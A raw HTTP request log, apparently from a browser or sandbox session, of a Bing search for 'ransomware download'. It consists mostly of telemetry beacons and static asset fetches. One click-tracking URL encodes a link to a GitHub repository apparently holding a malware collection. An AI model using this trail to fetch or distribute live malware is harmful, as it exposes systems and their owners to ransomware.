GET https://www.bing.com/images/sbi?mmasync=1&ig=92027AEB1C3C42769F3D4EA5938FBAC6&iid=.5100&ptn=Web&ep=0&iconpl=1HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1709220749231%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22Time%22%3A678%2C%22time%22%3A694%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1709220749671%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A695%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220749672%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A695%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220749672%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5DHTTP Request
POST https://www.bing.com/rewardsapp/ncheader?ver=43901714&IID=SERP.5057&IG=92027AEB1C3C42769F3D4EA5938FBAC6HTTP Request
POST https://www.bing.com/rewardsapp/reportActivity?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5066&q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvViewLoaded%22,%22Text%22:%22ViewLoaded%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvLoadSydneyConvResWithPayWall%22,%22Text%22:%22false%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvUseSydneyPayWall%22,%22Text%22:%22false%22}]HTTP Response
200HTTP Request
POST https://www.bing.com/orgid/idtoken/conditionalHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspx?HTTP Request
GET https://www.bing.com/sharing/getsharecommoncontrol?CustomizedTitle=Check%20out%20this%20Bing%20answer&CustomizedContent=Here%27s%20an%20answer%20I%20got%20using%20the%20new%20Bing%2C%20the%20world%E2%80%99s%20first%20AI-powered%20answer%20engine.%20Click%20to%20see%20the%20full%20answer%20and%20try%20it%20yourself.&CustomizedShareOutImageThumbnailId=OBFB.73FF6ADE8CC93B6ED1EDA1CE557E2E09&ScenarioNameUsedForLog=Codex_ConversationMode&DisablePositioningActionMenuContent=true&DisableTopActions=true&DisplayMode=modal&ElementIdForPreview=enable&HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220749713%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220749725%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2265e0a36492484f42b32bdb23ff8003bf%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1709220749725%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220749749%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220749756%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1709220749756%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220749809%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1709220750015%2C%22Name%22%3A%222%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750465%2C%22Name%22%3A%22GAMV2.RenderShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220750465%2C%22Name%22%3A%22BindedScrollEvents%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
204HTTP Request
GET https://www.bing.com/welcomescreenassets?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5903HTTP Request
GET https://www.bing.com/fd/ls/l?BF=MSJ1&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]HTTP Request
GET https://www.bing.com/fd/ls/l?BF=MSJ0&IG=92027AEB1C3C42769F3D4EA5938FBAC6&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Request
GET https://www.bing.com/aes/c.gif?type=mv&tids=71,73&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0HTTP Request
GET https://www.bing.com/aes/c.gif?type=mv&tids=77,79,81,83&rg=1d03bcc77b2d472484cf2e8fec86c32c&reqver=1.0HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
204HTTP Response
204HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.ClientInst%22,%22FID%22:%22CI%22,%22Name%22:%22ResizeObserverLimit%22}]HTTP Response
200HTTP Request
GET https://www.bing.com/notifications/handle?action=1&nid=63245&view=BottomBanner_NoTitleRejectBtn&vertical=serpHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22Conversation%22%2C%22CustomData%22%3A%22%7B%5C%22metrics%5C%22%3A%7B%5C%22ChatInitialUIReady%5C%22%3A-1%7D%2C%5C%22convId%5C%22%3Anull%2C%5C%22Tone%5C%22%3A%5C%22Balanced%5C%22%2C%5C%22IsCCP%5C%22%3Afalse%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750496%2C%22Name%22%3A%22PerformanceData%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750585%2C%22Name%22%3A%22GAMV2.RenderShareCommonControlSuccess%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22Namespace%22%3A%22Conversation%22%2C%22Scenario%22%3A%22Codex_ConversationMode%22%2C%22CustomData%22%3A%22%7B%5C%22Scenario%5C%22%3A%5C%22Codex_ConversationMode%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220750586%2C%22Name%22%3A%22GAMV2.InitShareCommonControl%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1709220750844%2C%22Name%22%3A%22AllowAll%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1709220750844%2C%22Name%22%3A%22BnpClick%22%2C%22FID%22%3A%22Bnp%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750968%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750969%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22ShowAnimation%22%3A%22%22%2C%22RedDotAnimation%22%3A%22true%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AnimationLoad%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1709220750971%2C%22Name%22%3A%22AnimationLoad%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22bingpages%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2212%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialConfigDisabled%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5DHTTP Request
GET https://www.bing.com/geolocation/write?isBlocked=true&sid=172BBB3C780F696B1A6EAF0879376803&clientsid=undefinedHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220750981%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1709220751111%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5DHTTP Request
GET https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1HTTP Response
200HTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}]HTTP Response
204HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22hide%22}]HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751425%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751425%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751457%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751716%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751784%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751828%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220751936%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220752420%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220752512%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.Fab%22,%22FID%22:%22CI%22,%22Name%22:%22display%22,%22Text%22:%22show%22}]HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754124%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754323%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754487%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754786%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220754890%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755095%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755640%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755696%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220755729%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220756096%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220756162%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220756488%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5DHTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
204HTTP Request
POST https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=92027AEB1C3C42769F3D4EA5938FBAC6&ID=SERP,5493.1&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3Dd99eb265934584b9JmltdHM9MTcwOTE2NDgwMCZpZ3VpZD0wNjBiMzFlMy01OTNhLTYwNzAtMmMzZC0yNWQ3NTgwMjYxMWEmaW5zaWQ9NTQ5Mw%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D060b31e3-593a-6070-2c3d-25d75802611a%26psq%3Dransomware%2Bdownload%26u%3Da1aHR0cHM6Ly9naXRodWIuY29tL0VuZGVybWFuY2gvTWFsd2FyZURhdGFiYXNl%26ntb%3D1HTTP Response
200HTTP Request
GET https://www.bing.com/ck/a?!&&p=d99eb265934584b9JmltdHM9MTcwOTE2NDgwMCZpZ3VpZD0wNjBiMzFlMy01OTNhLTYwNzAtMmMzZC0yNWQ3NTgwMjYxMWEmaW5zaWQ9NTQ5Mw&ptn=3&ver=2&hsh=3&fclid=060b31e3-593a-6070-2c3d-25d75802611a&psq=ransomware+download&u=a1aHR0cHM6Ly9naXRodWIuY29tL0VuZGVybWFuY2gvTWFsd2FyZURhdGFiYXNl&ntb=1HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspxHTTP Response
200HTTP Response
204 -
9.3kB 91.8kB 85 112
HTTP Request
GET https://r.bing.com/rp/grT3cLlVZjA8qRHZG_Qwe-GLhWQ.br.cssHTTP Request
GET https://r.bing.com/rb/H/cir3,as,cc,nc/XuMXsYbF4DN-kSF16oeMfXSEomQ.css?bu=IosGrgOuA78ErgOuA64DrgOuA64DhQeHB-gGrgOuA64DrgPeBoMFugauA64D-wauA5oFrgOJB5YHrgOuA-AE8ATyBK4D&or=wHTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svgHTTP Request
GET https://r.bing.com/rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svgHTTP Request
GET https://r.bing.com/rp/2Ro4LD_2OaiuqUlZYlpozEd7Bf0.svgHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svgHTTP Request
GET https://r.bing.com/rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svgHTTP Request
GET https://r.bing.com/rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svgHTTP Request
GET https://r.bing.com/rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svgHTTP Request
GET https://r.bing.com/rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svgHTTP Request
GET https://r.bing.com/rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svgHTTP Request
GET https://r.bing.com/rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svgHTTP Request
GET https://r.bing.com/rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpgHTTP Request
GET https://r.bing.com/rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpgHTTP Request
GET https://r.bing.com/rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpgHTTP Request
GET https://r.bing.com/rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpgHTTP Request
GET https://r.bing.com/rp/dbmNS45xQvD1diApY1T2HExvOo8.jpgHTTP Request
GET https://r.bing.com/rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpgHTTP Request
GET https://r.bing.com/rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpgHTTP Request
GET https://r.bing.com/rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpgHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://r.bing.com/rp/c4ruj6QGsmSnOG64gJJnnnYDa44.br.cssHTTP Request
GET https://r.bing.com/rp/5-y8FBmAkXLBZZghI-X94CRnsqg.br.cssHTTP Request
GET https://r.bing.com/rp/WRGhsWGnkf3ko69VafMSpLBwgbk.br.cssHTTP Request
GET https://r.bing.com/rp/vDjLjnEkXEuH2C8u3tT0A004qwQ.br.cssHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200 -
92.4kB 1.9MB 1441 1480
HTTP Request
GET https://r.bing.com/rp/Y26LIcmRz0EdnBtSjtN2P4pbrp4.br.jsHTTP Request
GET https://r.bing.com/rp/R14ozkkie30zM6FSjzwWFp8Ffzk.br.jsHTTP Request
GET https://r.bing.com/rp/0qo7e16hAJuKr67fZ-dKtNlvtjg.br.jsHTTP Request
GET https://r.bing.com/rp/9MqrCXB0EVjVIRzDOArDGhu3yeM.br.jsHTTP Request
GET https://r.bing.com/rp/NKlfs_-_Zuwygh1SF6-C9XT2QxM.br.jsHTTP Request
GET https://r.bing.com/rp/4qLYPfN0EmVUH2TIgYLmYcXKYtQ.br.jsHTTP Request
GET https://r.bing.com/rp/-8B2JlFI9HgFcgp0RGJHcPQD2GM.br.jsHTTP Request
GET https://r.bing.com/rp/2DP4HPIfaNQ7pkpsKIkpRa3DF6Y.br.jsHTTP Request
GET https://r.bing.com/rp/2_T03GKj2lZLGoe1GR3JpyqblCM.br.jsHTTP Request
GET https://r.bing.com/rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.jsHTTP Request
GET https://r.bing.com/rp/mChBxas6km-Qf4z0OFnwyL0X2i4.br.jsHTTP Request
GET https://r.bing.com/rp/AFTQBNs7Ze3RPaQB_eH-C3JktUA.br.jsHTTP Request
GET https://r.bing.com/rp/ascyKFaOzJnUTZ_D-Mv819BZ0Go.br.jsHTTP Request
GET https://r.bing.com/rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.jsHTTP Request
GET https://r.bing.com/rp/n21aGRCN5EKHB3qObygw029dyNU.br.jsHTTP Request
GET https://r.bing.com/rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.jsHTTP Request
GET https://r.bing.com/rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.jsHTTP Request
GET https://r.bing.com/rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.jsHTTP Request
GET https://r.bing.com/rp/XJ8OmILbNhm0zU9tdkuGYeXVPRQ.br.jsHTTP Request
GET https://r.bing.com/rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.jsHTTP Request
GET https://r.bing.com/rp/9cuwOQ_qE7qTGKohzrf_gIjTlPI.br.jsHTTP Request
GET https://r.bing.com/rp/Gw7eETSwe7GHmKwW1lRqGPQJXRo.br.jsHTTP Request
GET https://r.bing.com/rp/psgXZvzYJMEW2ydikIk493Va1d4.br.jsHTTP Request
GET https://r.bing.com/rs/7b/xb/nj/jQ1w07qyCcc9l2abcuV-aLzD-d8.js?or=wHTTP Request
GET https://r.bing.com/rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.jsHTTP Request
GET https://r.bing.com/rp/Sjh4wvzd2Y3WP03lvCYB_XIB9oE.br.jsHTTP Request
GET https://r.bing.com/rp/K_V1CARn2Q2lTs5njJKUvUkHyi4.br.jsHTTP Request
GET https://r.bing.com/rp/6wAY24H4bipydO7Ktbp3eT4KcVo.br.jsHTTP Request
GET https://r.bing.com/rp/3US3nNU_RgsSNFm9Bzw6xgeuOHk.br.jsHTTP Request
GET https://r.bing.com/rp/-BEQ_TpHKH1ZqSGIHPUIMCXcsiY.br.jsHTTP Request
GET https://r.bing.com/rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.jsHTTP Request
